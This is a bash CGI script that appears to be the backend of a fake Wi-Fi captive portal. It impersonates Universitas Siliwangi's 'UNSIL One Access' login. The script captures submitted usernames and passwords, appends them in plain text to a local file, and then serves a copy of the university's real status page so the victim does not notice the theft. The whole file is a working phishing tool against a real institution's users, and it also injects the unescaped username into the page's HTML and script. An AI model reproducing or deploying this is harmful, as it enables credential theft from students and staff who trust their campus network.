#=================================#
#------- PORTAL WIFI@UNSIL -------#
#=================================#
#!/usr/bin/env bash

echo "Content-Type: text/html"
echo ""

# Ambil seluruh body POST
DATA=$(cat)

# Tangkap username dan password
USERNAME=$(echo "$DATA" | sed -n 's/.*username=//p' | sed 's/&.*//')
PASSWORD=$(echo "$DATA" | sed -n 's/.*password=//p')

# Format untuk disimpan
GABUNG="USER=$USERNAME PASS=$PASSWORD"

# Simpan ke file
sudo echo "$GABUNG" >> user-password.txt

# Delay sebelum menampilkan halaman
sleep 2.5

# OUTPUT HTML PERSIS SEPERTI HALAMAN UNSIL
cat <<EOF
<!DOCTYPE html>
<!-- saved from url=(0032)https://login.unsil.ac.id/status -->
<html lang="en">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
    <title>UNSIL One Access - Universitas Siliwangi &gt; Status</title>

    <meta http-equiv="refresh" content="900">
    <meta http-equiv="pragma" content="no-cache">
    <meta http-equiv="expires" content="-1">
    <link rel="shortcut icon" href="./UNSIL One Access - Universitas Siliwangi _ Status_files/logo.png" type="image/x-icon">

    <!-- CORE CSS-->
    <link rel="stylesheet" href="./UNSIL One Access - Universitas Siliwangi _ Status_files/materialize.min.css">

    <script>
        function openLogout() {
            if (window.name != 'hotspot_status') return true;
            open('http://login.unsil.ac.id/logout', 'hotspot_logout',
                'toolbar=0,location=0,directories=0,status=0,menubars=0,resizable=1,width=280,height=250');
            window.close();
            return false;
        }
    </script>
</head>

<body>
<form action="http://login.unsil.ac.id/logout" name="logout" onsubmit="return openLogout()">
    <div class="section no-pad-bot" id="index-banner">
        <div class="container">
            <div class="row center" style="margin-bottom:10px">
                <h5 class="header col s12 light">
                    <a href="https://unsil.ac.id/" target="_blank">
                        <img src="./UNSIL One Access - Universitas Siliwangi _ Status_files/logo.png" style="width:100px;">
                    </a>
                    <div style="text-align: center;padding-bottom:8px">UNSIL <b>One</b> <i>Access</i></div>
                    <div style="text-align: center;">Hello $USERNAME, have a nice day ;)</div>
                </h5>
            </div>

            <div class="row center">
                <div class="col s6 offset-s3">
                    <table class="bordered striped">
                        <tbody>
                            <tr><td align="right">Your IP Address:</td><td>10.16.1.2</td></tr>
                            <tr><td align="right">Bytes Up/Down:</td><td>12.9 KiB / 20.4 KiB</td></tr>
                            <tr><td align="right">Connected:</td><td>1s</td></tr>
                            <tr><td align="right">Status Refresh:</td><td>15m</td></tr>
                        </tbody>
                    </table>
                </div>
            </div>

            <div class="row center">
                <div class="col s8 offset-s2">
                    <a href="https://simak.unsil.ac.id/" class="waves-effect waves-light btn green open-simak" onclick="return openSimak(event, this);">SIMAK</a>
                    <a href="https://journal.unsil.ac.id/" target="_blank" class="waves-effect waves-light btn green open-simak">JOURNAL</a>
                    <a href="http://mail.unsil.ac.id/" target="_blank" class="waves-effect waves-light btn green open-simak">MAIL</a>
                    <a href="https://unsil.ac.id/" target="_blank" class="waves-effect waves-light btn green open-simak">HOME PAGE</a>

                    <br><br>

                    <i class="waves-effect waves-light btn red waves-input-wrapper">
                        <input type="submit" value="log off" class="waves-button-input">
                    </i>

                    <br><br>

                    <span><small style="position: relative;top:-5px;">
                        Code With Love <a href="https://upttik.unsil.ac.id/" class="green-text" target="_blank">UPT TIK UNSIL</a> 2020
                    </small></span>
                </div>
            </div>
        </div>
    </div>
</form>

<!-- JS -->
<script src="./UNSIL One Access - Universitas Siliwangi _ Status_files/jquery.min.js.download"></script>
<script src="./UNSIL One Access - Universitas Siliwangi _ Status_files/materialize.min.js.download"></script>

<script>
    function disabledClickMenu(event, el) {
        event.preventDefault();
        alert("Untuk sementara, fitur ini masih belum diaktifkan.");
    }

    function open_url() {
        var ip = '10.16.1.2';
        var mac = 'E0:0A:F6:C3:0A:A7';
        var username = '$USERNAME';
        var session_id = '';

        var auth_url = "https://ng.unsil.ac.id/ocs/integrated_login/check_session";
        var arguments = "?ip=" + ip + "&mac=" + mac;
        arguments += "&username=" + username;
        arguments += "&session-id=" + session_id;

        window.location.href = auth_url + arguments;
    }

    function openSimak(event, el) {
        event.preventDefault();
        open_url();
    }
</script>

</body>
</html>
EOF
